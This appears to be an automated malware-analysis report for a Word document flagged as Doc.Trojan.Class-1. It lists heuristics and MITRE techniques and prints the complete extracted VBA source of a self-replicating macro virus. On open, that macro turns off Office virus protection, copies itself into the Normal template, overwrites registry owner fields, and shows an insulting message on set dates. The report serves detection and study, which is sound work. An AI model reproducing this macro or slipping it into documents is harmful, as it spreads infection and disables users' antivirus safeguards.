MALICIOUS
156
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1027 Obfuscated Files or Information
The sample contains VBA macros that disable Office macro security features and replicate themselves into the Normal template, indicating an attempt to establish persistence and evade antivirus. The critical heuristic 'OLE_VBA_MACRO_VIRUS_REPLICATION' and the presence of AutoOpen/AutoClose macros strongly suggest malicious intent. The script also attempts to write to the registry key HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings to disable macro warnings.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
.replaceline 1, "Sub AutoClose()"
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4815 bytes |
SHA-256: 62a856f005bb2d7f2b8a22e3f1f589784084dda16941a154e13f67996f5b839d |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Private Declare Function RegSetValueExA Lib "advapi32.dll" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Const REG_SZ As Long = 1
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Const HKEY_CURRENT_USER As Long = &H80000001
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Const HKEY_LOCAL_MACHINE As Long = &H80000002
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Sub AutoOpen()
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
On Error GoTo out
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Options.VirusProtection = False
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Options.SaveNormalPrompt = False
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
Options.ConfirmConversions = False
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
ad = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'wxj99-10-29 8:47:46ÌúÈýÔºÐèÇó
nt = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If nt > 70 And ad > 0 Then GoTo out
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If nt < 70 Then
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
Set host = NormalTemplate.VBProject.VBComponents.Item(1)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
ActiveDocument.VBProject.VBComponents.Item(1).Name = host.Name
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\class.sys"
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End If
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If ad = 0 Then Set host = ActiveDocument.VBProject.VBComponents.Item(1)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If Day(Now) = 14 And Month(Now) > 5 Then MsgBox "I Think " & Application.UserName & " is a big stupid jerk!", 0, "Class.Poppy"
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
host.codemodule.AddFromFile ("c:\class.sys")
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
With host.codemodule
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
For x = 1 To 16
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.deletelines 1
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
Next x
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End With
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If nt < 70 Then
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
With host.codemodule
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.replaceline 1, "Sub AutoClose()"
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.replaceline 91, "Sub ToolsMacro()"
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
For x = 70 To 81
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.deletelines 62
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
Next x
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.replaceline 35, " For x = 1 To 4"
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End With
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End If
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If nt < 70 Then
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
u = RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, k)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
u = RegSetValueExA(k, "RegisteredOwner", 0, REG_SZ, "VicodinES /CB /TNN", 1)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
u = RegSetValueExA(k, "RegisteredOrganization", 0, REG_SZ, "-(Dr. Diet Mountain Dew)-", 1)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
u = RegCloseKey(k)
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End If
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
With host.codemodule
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
For x = 2 To 104 Step 2
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
Next x
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End With
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
out:
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
If nt > 70 And ad = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End Sub
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
Sub ViewVBCode()
'wxj99-10-29 8:47:47ÌúÈýÔºÐèÇó
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.